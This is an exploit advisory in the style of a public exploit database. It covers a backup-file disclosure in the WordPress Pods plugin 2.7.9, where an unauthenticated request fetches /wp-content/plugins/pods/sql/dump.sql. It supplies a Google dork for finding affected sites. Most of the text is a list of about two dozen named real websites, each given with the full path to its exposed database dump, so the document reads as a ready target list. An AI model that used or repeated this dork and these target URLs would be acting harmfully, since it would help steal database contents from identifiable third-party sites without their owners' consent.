WordPress Pods 2.7.9 Database Disclosure Vulnerability

2018-11-25
ID: 100346
CVE: None
Download vulnerable application: None
#################################################################################################
 # Exploit Title : WordPress Pods Plugins 2.7.9 Database Backup Arbitrary
File Download Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security
Army
# Vendor Homepage :
+ wordpress.org/plugins/pods/ ~ pods.io
+
github.com/openmhealth/omh.website/blob/master/wp-content/plugins/pods/sql/dump.sql
# Software Download Link : downloads.wordpress.org/plugin/pods.2.7.9.zip
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 2.7.9
# Google Dorks : inurl:/wp-content/plugins/pods/
# Exploit Risk : Medium
# CWE : CWE-264 - [ Permissions, Privileges, and Access Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
 #################################################################################################
 # Admin Panel Login Path :
 /wp-login.php
 # Exploit :
 /wp-content/plugins/pods/sql/dump.sql
 #################################################################################################
 # Example Vulnerable Sites =>
 [+] oljesaljarna.se/wp-content/plugins/pods/sql/dump.sql
 [+] right-ink.com/wp-content/plugins/pods/sql/dump.sql
 [+] annpettersson.se/wp-content/plugins/pods/sql/dump.sql
 [+] actuarchi.com/wp-content/plugins/pods/sql/dump.sql
 [+] stcp.com.br/wp-content/plugins/pods/sql/dump.sql
 [+] vallicella.fr/wp-content/plugins/pods/sql/dump.sql
 [+] erichalfvarson.com/wp-content/plugins/pods/sql/dump.sql
 [+] spinefarmrecords.com/wp-content/plugins/pods/sql/dump.sql
 [+] few.org/wp-content/plugins/pods/sql/dump.sql
 [+] vbs-jasper.com/wp-content/plugins/pods/sql/dump.sql
 [+] kirabpemuda2018.com/wp-content/plugins/pods/sql/dump.sql
 [+] liveandinspire.com/wp-content/plugins/pods/sql/dump.sql
 [+] househunters.org/listings/wp-content/plugins/pods/sql/dump.sql
 [+] radioradio.fr/wp-content/plugins/pods/sql/dump.sql
 [+] hbclebanon.com/wp-content/plugins/pods/sql/dump.sql
 [+] montevidarentals.com/wp-content/plugins/pods/sql/dump.sql
 [+] autosijalice.rs/wp-content/plugins/pods/sql/dump.sql
 [+] smseafoodmarket.com/wp-content/plugins/pods/sql/dump.sql
 [+] brno-cernovice.cz/wp-content/plugins/pods/sql/dump.sql
 [+] inovageracao.com/wp-content/plugins/pods/sql/dump.sql
 [+] linneindustries.com/wp-content/plugins/pods/sql/dump.sql
 [+] ecovidaproperties.com/wp-content/plugins/pods/sql/dump.sql
 [+] hwzone.co.il/wp-content/plugins/pods/sql/dump.sql
 [+] inkafarma.com.pe/wp-content/plugins/pods/sql/dump.sql
 #################################################################################################
1.1.11-prod (www02)